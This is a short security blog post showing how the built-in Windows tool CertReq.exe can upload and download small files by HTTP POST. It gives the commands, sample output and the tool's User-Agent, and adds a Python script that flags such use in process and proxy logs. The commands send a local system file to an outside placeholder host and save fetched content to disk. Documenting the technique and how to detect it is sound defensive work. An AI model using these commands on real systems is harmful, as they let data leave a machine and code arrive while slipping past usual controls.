Upload and download small files with CertReq.exe


I stumbled on another lesser-known LOLBAS (https://lolbas-project.github.io/) for uploading and downloading (small) files. CertReq.exe is present on Windows and its intended use is to assist with the creation and installation of certificates.

You can use it as follows:

Upload a file via HTTP POST

Upload the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST.

CertReq -Post -config https://example.org/ c:\windows\win.ini

Download a file via HTTP POST and save it to disk

Download the file served when an HTTP POST request is made to https://example.org/ and save it to output.txt.

CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt

Download a file via HTTP POST and show contents

Download the file served when an HTTP POST request is made to https://example.org/ and show contents.

CertReq -Post -config https://example.org/ c:\windows\win.ini

Example Output

Note that it shows the HTTP response headers in all cases; whether the content of the HTTP response is also shown depends on whether an output file is specified.

>CertReq -Post -config https://example.org/ c:\windows\win.ini
OK
HTTP/1.1 200 OK
Cache-Control: max-age=604800
Date: Tue, 07 Jul 2020 19:50:58 GMT
Content-Length: 1256
Content-Type: text/html; charset=UTF-8
Expires: Tue, 14 Jul 2020 19:50:58 GMT
Last-Modified: Thu, 17 Oct 2019 07:18:26 GMT
Accept-Ranges: bytes
ETag: "3147526947"
Server: EOS (vny/0454)

<!doctype html>
<html>
<head>
<title>Example Domain</title>
--snip--

Note: Small files only!

Due to something going on with the internals of CertReq.exe, only small files (not sure on the specific size limitations) appear to work; otherwise you get the below error!

CertReq.exe fails with the above error if the file to upload or download is too big

Notes

The user agent for my test Windows 10 version 19041.329 was:

Mozilla/4.0 (compatible; Win32; NDES client 10.0.19041.1/vb_release)
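
For detection, the two artifacts described above (the `-Post -config <URL>` command line and the NDES client User-Agent) can be checked in process-creation and proxy logs. The following is an added example, not code from the original post or from the LOLBAS project; the function names, the sample records and the handling of a `/` switch prefix are assumptions made for illustration.

```python
import re
import shlex

# "NDES client" is the distinctive part of the User-Agent quoted in the post;
# matching on it without the build number is an assumption.
NDES_UA_MARKER = "ndes client"

def parse_certreq_post(cmdline):
    """Return url/input/output for 'CertReq -Post -config <URL> ...', else None."""
    try:
        tokens = shlex.split(cmdline, posix=False)  # keep Windows backslashes
    except ValueError:                              # unbalanced quote in the log
        tokens = cmdline.split()
    tokens = [t.strip('"') for t in tokens]
    if not tokens or re.split(r"[\\/]", tokens[0])[-1].lower() not in ("certreq", "certreq.exe"):
        return None
    post, url, files, i = False, None, [], 1
    while i < len(tokens):
        low = tokens[i].lower()
        if low in ("-post", "/post"):               # '/' prefix: assumed alternate form
            post = True
        elif low in ("-config", "/config") and i + 1 < len(tokens):
            i += 1
            url = tokens[i]
        elif not low.startswith(("-", "/")):
            files.append(tokens[i])                 # input file, then optional output file
        i += 1
    # Only flag -config values that are URLs, as in the post's commands.
    if not (post and url and re.match(r"https?://", url, re.I)):
        return None
    files += [None, None]
    return {"url": url, "input": files[0], "output": files[1]}

def ndes_user_agent(ua):
    """True if a proxy-log User-Agent carries the marker seen in the post."""
    return NDES_UA_MARKER in (ua or "").lower()

# Constructed sample data (not real logs): process command lines and proxy User-Agents.
SAMPLE_CMDLINES = [
    r"CertReq -Post -config https://example.org/ c:\windows\win.ini",
    r'"C:\Windows\System32\certreq.exe" -POST -Config https://example.org/ c:\windows\win.ini output.txt',
    r"certreq -new request.inf request.req",        # ordinary certificate request
    r"notepad.exe c:\windows\win.ini",
]
SAMPLE_UAS = [
    "Mozilla/4.0 (compatible; Win32; NDES client 10.0.19041.1/vb_release)",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
]

def triage(cmdlines, user_agents):
    """Return (parsed CertReq -Post hits, User-Agents carrying the NDES marker)."""
    hits = [h for h in map(parse_certreq_post, cmdlines) if h]
    return hits, [ua for ua in user_agents if ndes_user_agent(ua)]
```

A hit with an `input` path but no `output` matches the upload and show-contents forms; a hit with both matches the save-to-disk form.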

I also added a pull request to the LOLBAS project:

Create certreq.yml by dtmsecurity · Pull Request #75 · LOLBAS-Project/LOLBAS
For informational and educational purposes only.
